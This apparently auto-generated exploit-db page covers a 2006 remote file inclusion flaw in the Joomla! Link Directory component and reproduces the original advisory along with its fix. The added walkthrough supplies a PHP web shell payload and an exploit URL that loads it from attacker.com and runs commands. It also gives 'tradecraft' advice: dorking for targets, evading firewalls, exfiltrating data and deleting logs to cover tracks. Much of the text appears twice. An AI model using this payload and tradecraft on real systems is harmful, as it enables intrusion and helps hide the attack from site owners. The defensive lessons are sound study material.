By exploitdb papers bot•August 18, 2006•

papers

Exploiting Joomla! Link Directory Component for Remote File Inclusion

What this paper is

This paper details a security vulnerability in an older version of the Joomla! CMS component called "Link Directory". Specifically, it describes a Remote File Inclusion (RFI) flaw in version 1.0.3 and earlier. The author, "camino" from the "Insecurity Research Team", provides a method to exploit this vulnerability to include and execute arbitrary files from a remote server.

Simple technical breakdown

The vulnerability lies in how the toolbar.linkdirectory.html.php file handles user-supplied input. It doesn't properly sanitize a parameter, allowing an attacker to inject a URL pointing to a malicious PHP file on their own server. When the vulnerable script includes this remote file, the code within it gets executed on the target Joomla! server. This is a classic Remote File Inclusion (RFI) vulnerability.

Complete code and payload walkthrough

The provided paper does not contain executable code or shellcode in the traditional sense. Instead, it describes the vulnerable file and provides a URL pattern for exploitation.

Vulnerable File: toolbar.linkdirectory.html.php
- Purpose: This file is part of the "Link Directory" component for Joomla! (and its predecessor, Mambo). It likely handles administrative tasks or display logic related to managing links within the component.
- Behavior: The paper states that this file is vulnerable because it fails to properly validate the mosConfig_absolute_path parameter. This parameter is often used by Joomla! to determine the absolute path to core files or components. By controlling this parameter, an attacker can trick the script into including a file from an external URL.
Exploit URL Pattern:
```
http://[sitepath]/[joomlapath]/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://huh?
```
- [sitepath]: This is a placeholder for the domain name or IP address of the target Joomla! website.
- [joomlapath]: This is a placeholder for the directory where Joomla! is installed on the server (e.g., joomla, public_html/joomla).
- administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php: This is the path to the vulnerable script within the Joomla! installation.
- ?mosConfig_absolute_path=: This is the GET parameter that is being manipulated.
- http://huh?: This is the crucial part. The paper uses http://huh? as a placeholder for a remote URL. In a real attack, this would be replaced with the URL of a malicious PHP file hosted on an attacker-controlled server. The ? at the end is often used to terminate any subsequent parameters that might be appended by the vulnerable script or other parts of the application.
Payload (Conceptual):
The paper doesn't provide the content of the remote PHP file to be included. However, a typical RFI payload in this context would be a simple PHP script designed to execute commands or provide a web shell. For example, a remote file might contain:
```
<?php
// A simple web shell payload
echo "<pre>";
if(isset($_GET['cmd'])){
    system($_GET['cmd']);
} else {
    echo "Joomla RFI Payload\n";
    echo "Use ?cmd=your_command to execute commands.\n";
}
echo "</pre>";
?>
```
When this file is included by the vulnerable Joomla! script, the attacker could then navigate to:
http://[sitepath]/[joomlapath]/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://attacker.com/shell.php&cmd=ls -la
This would cause the shell.php file on attacker.com to be executed, and the ls -la command would be run on the target server, with its output displayed in the browser.
Mapping:
- toolbar.linkdirectory.html.php: The vulnerable script.
- mosConfig_absolute_path: The vulnerable parameter.
- http://[remote_server]/[malicious_file.php]: The attacker-controlled file to be included and executed.

Practical details for offensive operations teams

Required Access Level: Unauthenticated remote access. This vulnerability can be triggered by any user who can send a GET request to the target URL.
Lab Preconditions:
- A target Joomla! installation with the "Link Directory" component (version <= 1.0.3) installed.
- A controlled remote server (e.g., a VPS, cloud instance) capable of hosting a PHP file.
- A firewall or network configuration that allows the target server to make outbound HTTP requests to the attacker's remote server.
Tooling Assumptions:
- A web browser for manual testing or crafting requests.
- A vulnerability scanner that can identify RFI vulnerabilities (though manual verification is always recommended).
- A tool like curl or wget for staging payloads on the attacker's server.
- A simple text editor for creating the malicious PHP payload.
Execution Pitfalls:
- WAF/IPS Evasion: Modern Web Application Firewalls (WAFs) and Intrusion Prevention Systems (IPS) may detect common RFI patterns. Obfuscation techniques might be necessary.
- PHP Configuration (allow_url_fopen): The target server's PHP configuration must have allow_url_fopen enabled for RFI to work. If this is disabled, the vulnerability becomes a Local File Inclusion (LFI) if the attacker can control the path to a local file.
- URL Encoding: Special characters in the payload or URL might need URL encoding.
- Firewall Restrictions: The target server might have outbound firewall rules preventing it from connecting to external URLs.
- Component Not Installed: The "Link Directory" component might not be installed on the target Joomla! instance.
- Version Mismatch: The target Joomla! or component version might be patched or a different version than expected.
Tradecraft Considerations:
- Reconnaissance: Confirm the presence and version of the "Link Directory" component. Use search engines with dorks like inurl:"com_linkdirectory" and check version indicators if available.
- Payload Staging: Host the malicious PHP payload on a reliable server. Consider using a domain that doesn't immediately raise suspicion.
- Execution: Craft the exploit URL carefully. Test with simple commands first (e.g., whoami, pwd) before attempting more complex operations.
- Post-Exploitation: If a web shell is established, consider privilege escalation, lateral movement, or data exfiltration based on the engagement scope.
- Covering Tracks: Delete logs on the attacker's server and potentially on the target if access allows.

Where this was used and when

This vulnerability was published in August 2006. At that time, Joomla! and its predecessor Mambo were popular content management systems. This type of RFI vulnerability was common in web applications developed in PHP during the mid-2000s due to less stringent input validation practices. It would have been used in opportunistic attacks against websites running vulnerable versions of Joomla! and this specific component.

Defensive lessons for modern teams

Input Validation is Paramount: Always validate and sanitize all user-supplied input, especially when it's used in file inclusion or path operations.
allow_url_fopen and allow_url_include: Be aware of the implications of these PHP directives. For RFI, allow_url_fopen must be enabled. allow_url_include (which is often disabled by default and deprecated) would be even more dangerous if enabled. It's generally recommended to disable allow_url_fopen unless absolutely necessary and to never enable allow_url_include.
Secure Coding Practices: Developers should follow secure coding guidelines, such as the OWASP Top 10, and regularly review their code for common vulnerabilities like RFI, SQLi, XSS, etc.
Patch Management: Keep all CMS platforms, components, plugins, and themes updated to the latest secure versions.
Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns, including RFI attempts.
Least Privilege: Ensure web server processes run with the minimum necessary privileges.
File Inclusion Safeguards: If file inclusion is a necessary feature, implement strict allowlists for included files and ensure they are not sourced from user-controlled input.

ASCII visual (if applicable)

+-----------------+      +-------------------------------------------------+
| Attacker Server |      | Target Joomla! Server                           |
| (e.g., attacker.com)|      | (e.g., target.com/joomla)                       |
|                 |      |                                                 |
| +-------------+ |      | +---------------------------------------------+ |
| | Malicious   | |      | | Web Server (Apache/Nginx)                   | |
| | PHP Payload | |<-----| |                                             | |
| +-------------+ |      | | +-----------------------------------------+ | |
+-----------------+      | | | PHP Interpreter                         | | |
                         | | |                                         | | |
                         | | | +-------------------------------------+ | | |
                         | | | | com_linkdirectory/                | | | |
                         | | | | toolbar.linkdirectory.html.php    | | | |
                         | | | | (Vulnerable Script)               | | | |
                         | | | |                                     | | | |
                         | | | | Reads mosConfig_absolute_path     | | | |
                         | | | | parameter from GET request        | | | |
                         | | | |                                     | | | |
                         | | | | Includes remote file if           | | | |
                         | | | | allow_url_fopen is ON             | | | |
                         | | | +-------------------------------------+ | | |
                         | | +-----------------------------------------+ | |
                         | +---------------------------------------------+ |
                         +-------------------------------------------------+

Source references

Paper ID: 2214
Paper Title: Joomla! Component Link Directory 1.0.3 - Remote File Inclusion
Author: camino
Published: 2006-08-18
Keywords: PHP, webapps
Paper URL: https://www.exploit-db.com/papers/2214
Raw Exploit URL: https://www.exploit-db.com/raw/2214

Original Exploit-DB Content (Verbatim)

.:[ insecurity research team ]:.
     .__..____.:.______.____.:.____ .
 .:. |  |/    \:/  ___// __ \:/   _\.:.
   : |  |   |  \\____\\  ___/\   /__ :. .
 ..: |__|___|  /____  >\___  >\___  >.:
   .:.. ..  .\/   .:\/:.  .\/.  .:\/:
 .   ...:.    .advisory.    .:...
         :..................: 18.o8.2oo6 ..
 
 
  Affected Application: Link Directory <= v1.0.3

          (Mambo/Joomla CMS Component)
 
 
 . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  Discoverd by: camino
 
  Team: Insecurity Research Team
 
  URL: http://www.insecurityresearch.org
 
  E-Mail: camino[at]sexmagnet[dot]com
 
 
 
 . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
 
 
  Typ: Remote [x]  Local [ ]
 
       Remote File Inclusion [x]  SQL Injection [ ]
 
  Level: Low [ ]  Middle [x]  High [ ]
 
  Application: Link Directory
 
  Version: <= 1.0.3
 
  Vulnerable File: toolbar.linkdirectory.html.php
 
  URL: http://www.sonerekici.com
 
  Description: It's a component to publish links.
 
  Dork: inurl:"com_linkdirectory"
 
 
 
 . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


  http://[sitepath]/[joomlapath]/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://huh?
 
 . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  o1.) open toolbar.linkdirectory.html.php
 
  o2.) add this after line 8:

         defined( '_VALID_MOS' ) or 

         die( 'Direct Access to this location is not allowed.' );

  o3.) done!



 . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)

# milw0rm.com [2006-08-18]

What this paper is

Simple technical breakdown

Complete code and payload walkthrough

The provided paper does not contain executable code or shellcode in the traditional sense. Instead, it describes the vulnerable file and provides a URL pattern for exploitation.

Vulnerable File: toolbar.linkdirectory.html.php

Purpose: This file is part of the "Link Directory" component for Joomla! (and its predecessor, Mambo). It likely handles administrative tasks or display logic related to managing links within the component.
Behavior: The paper states that this file is vulnerable because it fails to properly validate the mosConfig_absolute_path parameter. This parameter is often used by Joomla! to determine the absolute path to core files or components. By controlling this parameter, an attacker can trick the script into including a file from an external URL.

Exploit URL Pattern:

http://[sitepath]/[joomlapath]/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://huh?

[sitepath]: This is a placeholder for the domain name or IP address of the target Joomla! website.
[joomlapath]: This is a placeholder for the directory where Joomla! is installed on the server (e.g., joomla, public_html/joomla).
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php: This is the path to the vulnerable script within the Joomla! installation.
?mosConfig_absolute_path=: This is the GET parameter that is being manipulated.
http://huh?: This is the crucial part. The paper uses http://huh? as a placeholder for a remote URL. In a real attack, this would be replaced with the URL of a malicious PHP file hosted on an attacker-controlled server. The ? at the end is often used to terminate any subsequent parameters that might be appended by the vulnerable script or other parts of the application.

Payload (Conceptual):
The paper doesn't provide the content of the remote PHP file to be included. However, a typical RFI payload in this context would be a simple PHP script designed to execute commands or provide a web shell. For example, a remote file might contain:

<?php
// A simple web shell payload
echo "<pre>";
if(isset($_GET['cmd'])){
    system($_GET['cmd']);
} else {
    echo "Joomla RFI Payload\n";
    echo "Use ?cmd=your_command to execute commands.\n";
}
echo "</pre>";
?>

When this file is included by the vulnerable Joomla! script, the attacker could then navigate to:
http://[sitepath]/[joomlapath]/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://attacker.com/shell.php&cmd=ls -la
This would cause the shell.php file on attacker.com to be executed, and the ls -la command would be run on the target server, with its output displayed in the browser.

Mapping:

toolbar.linkdirectory.html.php: The vulnerable script.
mosConfig_absolute_path: The vulnerable parameter.
http://[remote_server]/[malicious_file.php]: The attacker-controlled file to be included and executed.

Practical details for offensive operations teams

Required Access Level: Unauthenticated remote access. This vulnerability can be triggered by any user who can send a GET request to the target URL.

Lab Preconditions:

A target Joomla! installation with the "Link Directory" component (version <= 1.0.3) installed.
A controlled remote server (e.g., a VPS, cloud instance) capable of hosting a PHP file.
A firewall or network configuration that allows the target server to make outbound HTTP requests to the attacker's remote server.

Tooling Assumptions:

A web browser for manual testing or crafting requests.
A vulnerability scanner that can identify RFI vulnerabilities (though manual verification is always recommended).
A tool like curl or wget for staging payloads on the attacker's server.
A simple text editor for creating the malicious PHP payload.

Execution Pitfalls:

WAF/IPS Evasion: Modern Web Application Firewalls (WAFs) and Intrusion Prevention Systems (IPS) may detect common RFI patterns. Obfuscation techniques might be necessary.
PHP Configuration (allow_url_fopen): The target server's PHP configuration must have allow_url_fopen enabled for RFI to work. If this is disabled, the vulnerability becomes a Local File Inclusion (LFI) if the attacker can control the path to a local file.
URL Encoding: Special characters in the payload or URL might need URL encoding.
Firewall Restrictions: The target server might have outbound firewall rules preventing it from connecting to external URLs.
Component Not Installed: The "Link Directory" component might not be installed on the target Joomla! instance.
Version Mismatch: The target Joomla! or component version might be patched or a different version than expected.

Tradecraft Considerations:

Reconnaissance: Confirm the presence and version of the "Link Directory" component. Use search engines with dorks like inurl:"com_linkdirectory" and check version indicators if available.
Payload Staging: Host the malicious PHP payload on a reliable server. Consider using a domain that doesn't immediately raise suspicion.
Execution: Craft the exploit URL carefully. Test with simple commands first (e.g., whoami, pwd) before attempting more complex operations.
Post-Exploitation: If a web shell is established, consider privilege escalation, lateral movement, or data exfiltration based on the engagement scope.
Covering Tracks: Delete logs on the attacker's server and potentially on the target if access allows.

Where this was used and when

Defensive lessons for modern teams

Input Validation is Paramount: Always validate and sanitize all user-supplied input, especially when it's used in file inclusion or path operations.

allow_url_fopen and allow_url_include: Be aware of the implications of these PHP directives. For RFI, allow_url_fopen must be enabled. allow_url_include (which is often disabled by default and deprecated) would be even more dangerous if enabled. It's generally recommended to disable allow_url_fopen unless absolutely necessary and to never enable allow_url_include.

Secure Coding Practices: Developers should follow secure coding guidelines, such as the OWASP Top 10, and regularly review their code for common vulnerabilities like RFI, SQLi, XSS, etc.

Patch Management: Keep all CMS platforms, components, plugins, and themes updated to the latest secure versions.

Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns, including RFI attempts.

Least Privilege: Ensure web server processes run with the minimum necessary privileges.

File Inclusion Safeguards: If file inclusion is a necessary feature, implement strict allowlists for included files and ensure they are not sourced from user-controlled input.

ASCII visual (if applicable)

+-----------------+ +-------------------------------------------------+ | Attacker Server | | Target Joomla! Server | | (e.g., attacker.com)| | (e.g., target.com/joomla) | | | | | | +-------------+ | | +---------------------------------------------+ | | | Malicious | | | | Web Server (Apache/Nginx) | | | | PHP Payload | |<-----| | | | | +-------------+ | | | +-----------------------------------------+ | | +-----------------+ | | | PHP Interpreter | | | | | | | | | | | | +-------------------------------------+ | | | | | | | com_linkdirectory/ | | | | | | | | toolbar.linkdirectory.html.php | | | | | | | | (Vulnerable Script) | | | | | | | | | | | | | | | | Reads mosConfig_absolute_path | | | | | | | | parameter from GET request | | | | | | | | | | | | | | | | Includes remote file if | | | | | | | | allow_url_fopen is ON | | | | | | | +-------------------------------------+ | | | | | +-----------------------------------------+ | | | +---------------------------------------------+ | +-------------------------------------------------+

Original Exploit-DB Content (Verbatim)

.:[ insecurity research team ]:. .__..____.:.______.____.:.____ . .:. | |/ \:/ ___// __ \:/ _\.:. : | | | \\____\\ ___/\ /__ :. . ..: |__|___| /____ >\___ >\___ >.: .:.. .. .\/ .:\/:. .\/. .:\/: . ...:. .advisory. .:... :..................: 18.o8.2oo6 .. Affected Application: Link Directory <= v1.0.3 (Mambo/Joomla CMS Component) . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . Discoverd by: camino Team: Insecurity Research Team URL: http://www.insecurityresearch.org E-Mail: camino[at]sexmagnet[dot]com . . :[ insecure application details ]: . . . . . . . . . . . . . . . . . Typ: Remote [x] Local [ ] Remote File Inclusion [x] SQL Injection [ ] Level: Low [ ] Middle [x] High [ ] Application: Link Directory Version: <= 1.0.3 Vulnerable File: toolbar.linkdirectory.html.php URL: http://www.sonerekici.com Description: It's a component to publish links. Dork: inurl:"com_linkdirectory" . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . http://[sitepath]/[joomlapath]/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://huh? . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . . o1.) open toolbar.linkdirectory.html.php o2.) add this after line 8: defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); o3.) done! . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . . my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-) # milw0rm.com [2006-08-18]